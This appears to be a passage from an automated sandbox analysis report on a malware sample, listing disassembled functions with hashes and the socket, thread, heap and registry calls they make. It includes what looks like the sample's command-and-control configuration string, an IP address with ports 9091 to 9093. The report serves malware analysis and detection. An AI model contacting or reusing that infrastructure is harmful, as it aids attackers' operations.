                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                  • Instruction ID: 189435d4d200edbc8bac22bc817bb7e33be7d980016b9458f6e301f0ff4c07a3
                                                                                                  • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                  • Instruction Fuzzy Hash: 6AA17078A0062AEFCB14CFA9C984AADB7F1FF58308F148169E419DB751D730E995CB90
                                                                                                  Function 02D03360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Time_memmovetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1463837790-0
                                                                                                  • Opcode ID: 931c8211f04cd79a80f10d84b23818fecf7e59914b77466278ebf48adf7b6931
                                                                                                  • Instruction ID: 17326e1d5b165f733ccc4f8414701e34001a20e72dc9a4a57b2fc6390e5f3caa
                                                                                                  • Opcode Fuzzy Hash: 931c8211f04cd79a80f10d84b23818fecf7e59914b77466278ebf48adf7b6931
                                                                                                  • Instruction Fuzzy Hash: E751B0727006019FD755DF69C8C0B6AB7A6FF88314B1486ACE9598B7A0DB31FC51CBA0
                                                                                                  Function 00973350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time_memmovetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1463837790-0
                                                                                                  • Opcode ID: 5177ee9fad7bf00bcfd49d11bd16f64d52456b46d700af4c2f2ce024a3f7eeed
                                                                                                  • Instruction ID: f72ca033bbd8859eacf2afbf1abd50e1fbd54d72b95b0a8deb1471a14ae0ebea
                                                                                                  • Opcode Fuzzy Hash: 5177ee9fad7bf00bcfd49d11bd16f64d52456b46d700af4c2f2ce024a3f7eeed
                                                                                                  • Instruction Fuzzy Hash: 1951BC73700201AFD729CF69C8C0A6AB7A9BF84314714C66CE91E8B711EB31ED41DB90
                                                                                                  Function 02D02FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02D03043
                                                                                                  • recv.WS2_32(?,?,00040000,00000000), ref: 02D03064
                                                                                                    • Part of subcall function 02D0F91B: __getptd_noexit.LIBCMT ref: 02D0F91B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexitrecvselect
                                                                                                  • String ID:
                                                                                                  • API String ID: 4248608111-0
                                                                                                  • Opcode ID: 8a19711ad44b903bf0d3130a19aba99ced214104123afaf26c7abb48f9205b60
                                                                                                  • Instruction ID: 9bd82284c5b7219062014264f50ecaf001e663c7c4542803eac9b642d54153ac
                                                                                                  • Opcode Fuzzy Hash: 8a19711ad44b903bf0d3130a19aba99ced214104123afaf26c7abb48f9205b60
                                                                                                  • Instruction Fuzzy Hash: DF219E70A012089FDB709F69DCC8F9A77A5EF44314F2445E5E904AB3E0DBB1AD84CBA1
                                                                                                  Function 00972FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00973023
                                                                                                  • recv.WS2_32(?,?,00040000,00000000), ref: 00973044
                                                                                                    • Part of subcall function 0097710D: __getptd_noexit.LIBCMT ref: 0097710D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexitrecvselect
                                                                                                  • String ID:
                                                                                                  • API String ID: 4248608111-0
                                                                                                  • Opcode ID: 411c3d15a60393f4d668f5fad58499e8cc94e9e8491f62d582cdc01a159490ed
                                                                                                  • Instruction ID: f0c4a06b293461403ca144a110c2636c8b12dfcda878946d4a616904210a81f4
                                                                                                  • Opcode Fuzzy Hash: 411c3d15a60393f4d668f5fad58499e8cc94e9e8491f62d582cdc01a159490ed
                                                                                                  • Instruction Fuzzy Hash: F621B772508208DFDB20DF68DC8AB9A7778EF45310F10C1A4E51DAB291D770EE84DBA1
                                                                                                  Function 02D03260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • send.WS2_32(?,?,00040000,00000000), ref: 02D03291
                                                                                                  • send.WS2_32(?,?,?,00000000), ref: 02D032CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: send
                                                                                                  • String ID:
                                                                                                  • API String ID: 2809346765-0
                                                                                                  • Opcode ID: 4e47ba113688258ebec6030bdbdd95f804f18df24e9ff81ed2e922bdec4c604c
                                                                                                  • Instruction ID: 60ddebc4666f8d03b0c642ff26d8370fced3837f0093e55b69743f8de6421af9
                                                                                                  • Opcode Fuzzy Hash: 4e47ba113688258ebec6030bdbdd95f804f18df24e9ff81ed2e922bdec4c604c
                                                                                                  • Instruction Fuzzy Hash: E111C272A02244ABC7A08A7ADDC8B5E7799FB49368F1180A5F908D73E0D2709D418654
                                                                                                  Function 02D030E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: SleepTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 346578373-0
                                                                                                  • Opcode ID: 0c588458ae85b2379ea734a634d0ca0b6c3107530913bd445182bebb0a670d85
                                                                                                  • Instruction ID: 05aa5690f13fb757c886be2d997f3af5a1905d613e50bff8acb2dc237a209de6
                                                                                                  • Opcode Fuzzy Hash: 0c588458ae85b2379ea734a634d0ca0b6c3107530913bd445182bebb0a670d85
                                                                                                  • Instruction Fuzzy Hash: CD01BC31600206AFD311CF28C8C8B69B7A5FB99305F1442A8E504872E0C771ADD6C7E2
                                                                                                  Function 009730C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: SleepTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 346578373-0
                                                                                                  • Opcode ID: 81fc066a513274fbb4f965cfc2d01c7014fbc63d6b5f46bff011614cfef8b07d
                                                                                                  • Instruction ID: d969e492cc14ca13b579c2d6f5702353dbf4f83d2388e913b93d75fb64ea799c
                                                                                                  • Opcode Fuzzy Hash: 81fc066a513274fbb4f965cfc2d01c7014fbc63d6b5f46bff011614cfef8b07d
                                                                                                  • Instruction Fuzzy Hash: B601B132704609AFD710DF29D8C8BA9B3A9FB99305F54C228D1088B690C771AE85D7D1
                                                                                                  Function 02D0CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • HeapCreate.KERNEL32(00000004,00000000,00000000,02D0E04E,00000000,02D09800,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D0CD1B
                                                                                                  • _free.LIBCMT ref: 02D0CD56
                                                                                                    • Part of subcall function 02D01280: __CxxThrowException@8.LIBCMT ref: 02D01290
                                                                                                    • Part of subcall function 02D01280: DeleteCriticalSection.KERNEL32(00000000,02D0D3E6,02D26624,?,?,02D0D3E6,?,?,?,?,02D25A40,00000000), ref: 02D012A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1116298128-0
                                                                                                  • Opcode ID: 4b0059f392af51ddbab69f7208bb92942569decb7befc70f1a5564aea5914a77
                                                                                                  • Instruction ID: 2d97bcfd1b492e31d0073c1e8b3584586a57536df039b0920aa416f114dd6328
                                                                                                  • Opcode Fuzzy Hash: 4b0059f392af51ddbab69f7208bb92942569decb7befc70f1a5564aea5914a77
                                                                                                  • Instruction Fuzzy Hash: D3017EB0A00B408FC330CF6A9884A07FAF9FF98700B504A1EE6DAC6B60D370A505CF65
                                                                                                  Function 00976410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,00975AF2), ref: 0097642B
                                                                                                  • _free.LIBCMT ref: 00976466
                                                                                                    • Part of subcall function 00971280: __CxxThrowException@8.LIBCMT ref: 00971290
                                                                                                    • Part of subcall function 00971280: DeleteCriticalSection.KERNEL32(00000000,?,00987E78), ref: 009712A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1116298128-0
                                                                                                  • Opcode ID: 7bc1de64ee48850c6b267b685a624aa7e4565570074210ed75badfd58582e283
                                                                                                  • Instruction ID: aead62755967af27577d46b936f450188b43dccc5bb4dff7a37c3572ffe8730f
                                                                                                  • Opcode Fuzzy Hash: 7bc1de64ee48850c6b267b685a624aa7e4565570074210ed75badfd58582e283
                                                                                                  • Instruction Fuzzy Hash: 8F017AF1A00B408FD7219F6A9844A07FAF8BF98710B108A1EE2DAC7B20D370A445CF95
                                                                                                  Function 02D0E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,02D0DF10,00000000,00000000,00000000), ref: 02D0E49B
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,02D11168,?,?,?,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D0E4A9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateObjectSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1891408510-0
                                                                                                  • Opcode ID: f38f42fe1f0ead332c1deb9bbca8a75af6736b2eebb966bb8e239eed16e049e0
                                                                                                  • Instruction ID: 511d92d8cb5c54c1471606c6b502b1f0671bd473a091ffe6e2c382e8234467ea
                                                                                                  • Opcode Fuzzy Hash: f38f42fe1f0ead332c1deb9bbca8a75af6736b2eebb966bb8e239eed16e049e0
                                                                                                  • Instruction Fuzzy Hash: DCE012B4984206BFEB109B54ECC9F7637ACE7183307108A25BD14C23D0D635DCA4CA60
                                                                                                  Function 02D0F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02D0F98F
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                    • Part of subcall function 02D0F964: __getptd_noexit.LIBCMT ref: 02D0F969
                                                                                                    • Part of subcall function 02D0F964: __freeptd.LIBCMT ref: 02D0F973
                                                                                                    • Part of subcall function 02D0F964: ExitThread.KERNEL32 ref: 02D0F97C
                                                                                                  • __XcptFilter.LIBCMT ref: 02D0F9B0
                                                                                                    • Part of subcall function 02D1418F: __getptd_noexit.LIBCMT ref: 02D14195
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 418257734-0
                                                                                                  • Opcode ID: bc92f432496d7395d4d40f823eab2a640c98717188a1e750851860b8cf5cda37
                                                                                                  • Instruction ID: 61bb4ae00496d0648d42346b1965fca789a62f06b1abe7da2988940f270b86eb
                                                                                                  • Opcode Fuzzy Hash: bc92f432496d7395d4d40f823eab2a640c98717188a1e750851860b8cf5cda37
                                                                                                  • Instruction Fuzzy Hash: 2DE0B6B5940701BFEB18EBA0E845E7D776AEF44B01F204188E1026B7A0CA759D449E20
                                                                                                  Function 00977175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 00977181
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                    • Part of subcall function 00977156: __getptd_noexit.LIBCMT ref: 0097715B
                                                                                                    • Part of subcall function 00977156: __freeptd.LIBCMT ref: 00977165
                                                                                                    • Part of subcall function 00977156: ExitThread.KERNEL32 ref: 0097716E
                                                                                                  • __XcptFilter.LIBCMT ref: 009771A2
                                                                                                    • Part of subcall function 00979C41: __getptd_noexit.LIBCMT ref: 00979C47
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 418257734-0
                                                                                                  • Opcode ID: fe81fca151e2e763f47355e786c42bf30913c8938eadaf5b48f48e0a83a306ca
                                                                                                  • Instruction ID: b5deae4bc2d81c6f2fdb63454dfc6b65e92b713507cee52c465f0cac38fc3b8b
                                                                                                  • Opcode Fuzzy Hash: fe81fca151e2e763f47355e786c42bf30913c8938eadaf5b48f48e0a83a306ca
                                                                                                  • Instruction Fuzzy Hash: D3E0ECB29046049FEB18FBA0C946F6D7B75EF84705F208048F1165B2B2DA759940DB24
                                                                                                  Function 02D16403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 02D1641B
                                                                                                    • Part of subcall function 02D18E5B: __mtinitlocknum.LIBCMT ref: 02D18E71
                                                                                                    • Part of subcall function 02D18E5B: __amsg_exit.LIBCMT ref: 02D18E7D
                                                                                                    • Part of subcall function 02D18E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,02D13F06,0000000D,02D26340,00000008,02D13FFF,00000000,?,02D110F0,00000000,02D26278,00000008,02D11155,?), ref: 02D18E85
                                                                                                  • __tzset_nolock.LIBCMT ref: 02D1642C
                                                                                                    • Part of subcall function 02D15D22: __lock.LIBCMT ref: 02D15D44
                                                                                                    • Part of subcall function 02D15D22: ____lc_codepage_func.LIBCMT ref: 02D15D8B
                                                                                                    • Part of subcall function 02D15D22: __getenv_helper_nolock.LIBCMT ref: 02D15DAD
                                                                                                    • Part of subcall function 02D15D22: _free.LIBCMT ref: 02D15DE4
                                                                                                    • Part of subcall function 02D15D22: _strlen.LIBCMT ref: 02D15DEB
                                                                                                    • Part of subcall function 02D15D22: __malloc_crt.LIBCMT ref: 02D15DF2
                                                                                                    • Part of subcall function 02D15D22: _strlen.LIBCMT ref: 02D15E08
                                                                                                    • Part of subcall function 02D15D22: _strcpy_s.LIBCMT ref: 02D15E16
                                                                                                    • Part of subcall function 02D15D22: __invoke_watson.LIBCMT ref: 02D15E2B
                                                                                                    • Part of subcall function 02D15D22: _free.LIBCMT ref: 02D15E3A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 1828324828-0
                                                                                                  • Opcode ID: 9737f7dbaa0b32071bcf3373546b01f0b7fcb8855630a5ab9e26cc6163751bc8
                                                                                                  • Instruction ID: 826427d194745f661d6c6421d7cd89b9a7016c3a1d4652026ea22358863f7b85
                                                                                                  • Opcode Fuzzy Hash: 9737f7dbaa0b32071bcf3373546b01f0b7fcb8855630a5ab9e26cc6163751bc8
                                                                                                  • Instruction Fuzzy Hash: 1BE0EC75CC5728F7D622ABE0B60261CB365EB94F22F504519E09012F89CA704D51DEB2
                                                                                                  Function 0097474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(|p1:8.217.85.20|o1:9091|t1:1|p2:8.217.85.20|o2:9092|t2:1|p3:8.217.85.20|o3:9093|t3:1|dd:1|cl:1|fz:), ref: 00974755
                                                                                                    • Part of subcall function 00973260: __wcsrev.LIBCMT ref: 00990655
                                                                                                  Strings
                                                                                                  • |p1:8.217.85.20|o1:9091|t1:1|p2:8.217.85.20|o2:9092|t2:1|p3:8.217.85.20|o3:9093|t3:1|dd:1|cl:1|fz:, xrefs: 00974750
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __wcsrevlstrlen
                                                                                                  • String ID: |p1:8.217.85.20|o1:9091|t1:1|p2:8.217.85.20|o2:9092|t2:1|p3:8.217.85.20|o3:9093|t3:1|dd:1|cl:1|fz:
                                                                                                  • API String ID: 4062721203-3341059043
                                                                                                  • Opcode ID: 33608de47a95b539af32dcd2e40bd5fa4ee1e16261ff02d472b19657d6a6c207
                                                                                                  • Instruction ID: 0495fac52b4950a5b1976484ec7556489293eaea825c7128b2fb9efe85a119dd
                                                                                                  • Opcode Fuzzy Hash: 33608de47a95b539af32dcd2e40bd5fa4ee1e16261ff02d472b19657d6a6c207
                                                                                                  • Instruction Fuzzy Hash: CCC08CB2248208CFEA003BD89408B2C3324EBB3B15F20C432F618C6642D9558C10F3B3
                                                                                                  Function 0097608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: 3090f025b9aabfcabd9902f0d0db14deab5623b230e306175c74f0a697886e75
                                                                                                  • Instruction ID: d06f2ae5ee441295bf6539250b8306a724c386d3c385025954006f765e64b582
                                                                                                  • Opcode Fuzzy Hash: 3090f025b9aabfcabd9902f0d0db14deab5623b230e306175c74f0a697886e75
                                                                                                  • Instruction Fuzzy Hash: 9AE09278918609EBDB14EF40D594BFD77B57B50304F30A555D00A6B294D37C2B08AB91
                                                                                                  Function 00975E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3660427363-0
                                                                                                  • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                  • Instruction ID: 94a50d4412003edb3e3fd3c2fe5a1f12d39b74b855576bea46f7b17f455e1d91
                                                                                                  • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                  • Instruction Fuzzy Hash: C1C08C22D4C75CE681207C545C29278B6E88704351F30ACB3A85B216C0A0AC2A9077EA
                                                                                                  Function 009760DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0098FAB1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
